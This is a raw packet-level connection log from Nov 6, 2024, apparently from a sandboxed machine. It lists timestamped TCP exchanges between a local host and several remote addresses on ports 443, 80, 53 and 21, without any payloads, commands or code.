                                              Nov 6, 2024 17:02:58.724359035 CET56918443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.724366903 CET4435691813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.724378109 CET56918443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.724383116 CET4435691813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.726984978 CET56922443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.727000952 CET4435692213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.727082968 CET56922443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.727231026 CET56922443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.727241039 CET4435692213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.215281963 CET8056919193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:59.216753006 CET56923443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:59.216805935 CET44356923188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:59.217000961 CET56923443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:59.217187881 CET56923443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:59.217205048 CET44356923188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:59.271066904 CET5691980192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:59.346927881 CET4435692013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.347567081 CET56920443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.347594976 CET4435692013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.348041058 CET56920443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.348047018 CET4435692013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.436024904 CET4435692113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.436480045 CET56921443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.436496973 CET4435692113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.436991930 CET56921443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.436996937 CET4435692113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.471182108 CET4435692213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.471618891 CET56922443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.471646070 CET4435692213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.472076893 CET56922443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.472081900 CET4435692213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.481384993 CET4435692013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.481534958 CET4435692013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.481586933 CET56920443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.481658936 CET56920443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.481673956 CET4435692013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.481683969 CET56920443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.481689930 CET4435692013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.484193087 CET56924443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.484230995 CET4435692413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.484297037 CET56924443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.484419107 CET56924443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.484428883 CET4435692413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.568870068 CET4435692113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.568937063 CET4435692113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.568989038 CET56921443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.569226980 CET56921443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.569251060 CET4435692113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.569262028 CET56921443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.569267035 CET4435692113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.573206902 CET56925443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.573256969 CET4435692513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.573328018 CET56925443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.573466063 CET56925443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.573482037 CET4435692513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.599756002 CET4435692213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.599809885 CET4435692213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.599858999 CET56922443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.600049973 CET56922443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.600069046 CET4435692213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.600079060 CET56922443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.600085974 CET4435692213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.605267048 CET56926443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.605295897 CET4435692613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.605351925 CET56926443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.605669022 CET56926443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:59.605679989 CET4435692613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:59.866425991 CET44356923188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:59.868240118 CET56923443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:59.868268967 CET44356923188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:03:00.029211998 CET44356923188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:03:00.029318094 CET44356923188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:03:00.029367924 CET56923443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:03:00.033014059 CET56923443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:03:00.046207905 CET5691980192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:03:00.048017979 CET5692780192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:03:00.051390886 CET8056919193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:03:00.051459074 CET5691980192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:03:00.052843094 CET8056927193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:03:00.052927971 CET5692780192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:03:00.053035021 CET5692780192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:03:00.057745934 CET8056927193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:03:00.236820936 CET4435692413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.237489939 CET56924443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.237517118 CET4435692413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.237946987 CET56924443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.237952948 CET4435692413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.300836086 CET4435692513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.301597118 CET56925443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.301630974 CET4435692513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.302061081 CET56925443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.302067995 CET4435692513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.360157967 CET4435692613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.360678911 CET56926443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.360724926 CET4435692613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.361124992 CET56926443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.361131907 CET4435692613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.388851881 CET4435692413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.388959885 CET4435692413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.389027119 CET56924443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.389249086 CET56924443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.389271021 CET4435692413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.389288902 CET56924443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.389297009 CET4435692413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.392033100 CET56928443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.392072916 CET4435692813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.392159939 CET56928443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.392328024 CET56928443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.392339945 CET4435692813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.432415009 CET4435692513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.432496071 CET4435692513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.432630062 CET56925443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.432908058 CET56925443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.432929039 CET4435692513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.432945013 CET56925443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.432950020 CET4435692513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.435992002 CET56929443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.436045885 CET4435692913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.436146021 CET56929443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.436316967 CET56929443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.436336040 CET4435692913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.491626978 CET4435692613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.491687059 CET4435692613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.491745949 CET56926443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.491941929 CET56926443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.491966963 CET4435692613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.491986036 CET56926443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.491993904 CET4435692613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.494705915 CET56930443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.494743109 CET4435693013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.494823933 CET56930443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.494982958 CET56930443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:00.494996071 CET4435693013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:00.894479990 CET8056927193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:03:00.895714045 CET56931443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:03:00.895768881 CET44356931188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:03:00.895864964 CET56931443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:03:00.896275043 CET56931443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:03:00.896285057 CET44356931188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:03:00.942801952 CET5692780192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:03:01.136322975 CET4435692813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.136915922 CET56928443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.136945009 CET4435692813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.137495995 CET56928443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.137501955 CET4435692813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.177329063 CET4435692913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.178896904 CET56929443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.178915024 CET4435692913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.180005074 CET56929443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.180030107 CET4435692913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.239891052 CET4435693013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.240478039 CET56930443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.240494013 CET4435693013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.240947962 CET56930443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.240952015 CET4435693013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.272285938 CET4435692813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.272358894 CET4435692813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.272408962 CET56928443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.272605896 CET56928443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.272615910 CET4435692813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.272625923 CET56928443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.272629976 CET4435692813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.275593996 CET56932443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.275631905 CET4435693213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.275722027 CET56932443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.275877953 CET56932443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.275887966 CET4435693213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.313963890 CET4435692913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.314019918 CET4435692913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.314078093 CET56929443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.314270973 CET56929443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.314290047 CET4435692913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.314301968 CET56929443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.314306974 CET4435692913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.317022085 CET56933443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.317054987 CET4435693313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.317138910 CET56933443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.317315102 CET56933443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.317329884 CET4435693313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.371537924 CET4435693013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.371603012 CET4435693013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.371676922 CET56930443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.371918917 CET56930443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.371934891 CET4435693013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.371968985 CET56930443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.371974945 CET4435693013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.374911070 CET56934443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.374946117 CET4435693413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.375031948 CET56934443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.375185013 CET56934443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:01.375195026 CET4435693413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:01.481854916 CET5008953192.168.2.6162.159.36.2
                                              Nov 6, 2024 17:03:01.487360001 CET5350089162.159.36.2192.168.2.6
                                              Nov 6, 2024 17:03:01.487435102 CET5008953192.168.2.6162.159.36.2
                                              Nov 6, 2024 17:03:01.487472057 CET5008953192.168.2.6162.159.36.2
                                              Nov 6, 2024 17:03:01.492873907 CET5350089162.159.36.2192.168.2.6
                                              Nov 6, 2024 17:03:01.532429934 CET44356931188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:03:01.534140110 CET56931443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:03:01.534182072 CET44356931188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:03:01.692761898 CET44356931188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:03:01.692863941 CET44356931188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:03:01.693047047 CET56931443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:03:01.693792105 CET56931443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:03:02.009248018 CET4435693213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.009661913 CET56932443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.009679079 CET4435693213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.010184050 CET56932443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.010190964 CET4435693213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.356117010 CET5350089162.159.36.2192.168.2.6
                                              Nov 6, 2024 17:03:02.356817007 CET5008953192.168.2.6162.159.36.2
                                              Nov 6, 2024 17:03:02.357727051 CET4435693313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.358171940 CET56933443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.358186007 CET4435693313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.358697891 CET56933443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.358707905 CET4435693313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.358971119 CET4435693413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.359632015 CET56934443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.359632015 CET56934443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.359642029 CET4435693413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.359654903 CET4435693413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.359947920 CET5350089162.159.36.2192.168.2.6
                                              Nov 6, 2024 17:03:02.359997988 CET5008953192.168.2.6162.159.36.2
                                              Nov 6, 2024 17:03:02.364434004 CET5350089162.159.36.2192.168.2.6
                                              Nov 6, 2024 17:03:02.364485025 CET5008953192.168.2.6162.159.36.2
                                              Nov 6, 2024 17:03:02.481574059 CET4435693213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.481734991 CET4435693213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.481820107 CET56932443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.481933117 CET56932443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.481942892 CET4435693213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.481954098 CET56932443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.481959105 CET4435693213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.484494925 CET50091443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.484508991 CET4435009113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.484590054 CET50091443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.484898090 CET50091443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.484908104 CET4435009113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.490379095 CET4435693313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.490406036 CET4435693313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.490441084 CET4435693313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.490472078 CET56933443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.490494013 CET56933443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.490572929 CET56933443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.490588903 CET4435693313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.490597963 CET56933443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.490603924 CET4435693313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.491560936 CET4435693413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.492151022 CET4435693413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.492209911 CET56934443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.492248058 CET56934443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.492252111 CET4435693413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.492270947 CET56934443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.492275000 CET4435693413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.492654085 CET50092443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.492696047 CET4435009213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.492748976 CET50092443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.492914915 CET50092443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.492932081 CET4435009213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.493983030 CET50093443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.493999004 CET4435009313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:02.494062901 CET50093443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.494162083 CET50093443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:02.494170904 CET4435009313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.002928972 CET5690580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:03:03.003652096 CET5009421192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:03.008518934 CET215009450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:03.008594036 CET8056905193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:03:03.008594036 CET5009421192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:03.008655071 CET5690580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:03:03.251116991 CET4435009113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.251971960 CET50091443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.251993895 CET4435009113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.252208948 CET4435009213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.252449989 CET50091443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.252459049 CET4435009113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.252664089 CET50092443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.252697945 CET4435009213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.253020048 CET50092443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.253026962 CET4435009213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.260751963 CET4435009313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.261207104 CET50093443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.261241913 CET4435009313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.261605978 CET50093443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.261614084 CET4435009313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.386154890 CET4435009113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.386255026 CET4435009113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.386368990 CET4435009113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.386406898 CET50091443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.386452913 CET50091443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.386657953 CET50091443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.386681080 CET4435009113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.386691093 CET50091443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.386696100 CET4435009113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.387506008 CET4435009213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.387778044 CET4435009213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.387867928 CET50092443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.388093948 CET50092443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.388115883 CET4435009213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.388130903 CET50092443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.388138056 CET4435009213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.390485048 CET50095443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.390537977 CET4435009513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.390619993 CET50095443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.390914917 CET50095443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.390937090 CET4435009513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.391470909 CET50096443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.391485929 CET4435009613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.391544104 CET50096443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.391649008 CET50096443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.391659021 CET4435009613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.397733927 CET4435009313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.397913933 CET4435009313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.400816917 CET50093443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.401173115 CET50093443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.401200056 CET4435009313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.401213884 CET50093443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.401221991 CET4435009313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.403342962 CET50097443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.403378010 CET4435009713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.403445005 CET50097443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.403717995 CET50097443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:03.403732061 CET4435009713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:03.548172951 CET215009450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:03.551290035 CET5009421192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:03.556303978 CET215009450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:03.701250076 CET215009450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:03.709415913 CET5009421192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:03.714637041 CET215009450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:03.994502068 CET215009450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:03.994751930 CET5009421192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:03.999631882 CET215009450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:04.115386963 CET4435009513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.126301050 CET50095443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:04.126343012 CET4435009513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.126791000 CET50095443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:04.126800060 CET4435009513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.143500090 CET4435009713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.144268036 CET215009450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:04.144442081 CET5009421192.168.2.650.31.176.103
                                              Nov 6, 2024 17:03:04.145463943 CET50097443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:04.145479918 CET4435009713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.145915031 CET50097443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:04.145920992 CET4435009713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.150028944 CET215009450.31.176.103192.168.2.6
                                              Nov 6, 2024 17:03:04.163309097 CET4435009613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.164458036 CET50096443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:04.164491892 CET4435009613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.164864063 CET50096443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:04.164869070 CET4435009613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.254997969 CET4435009513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.255459070 CET4435009513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:04.255675077 CET50095443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:04.261585951 CET50095443192.168.2.613.107.246.45
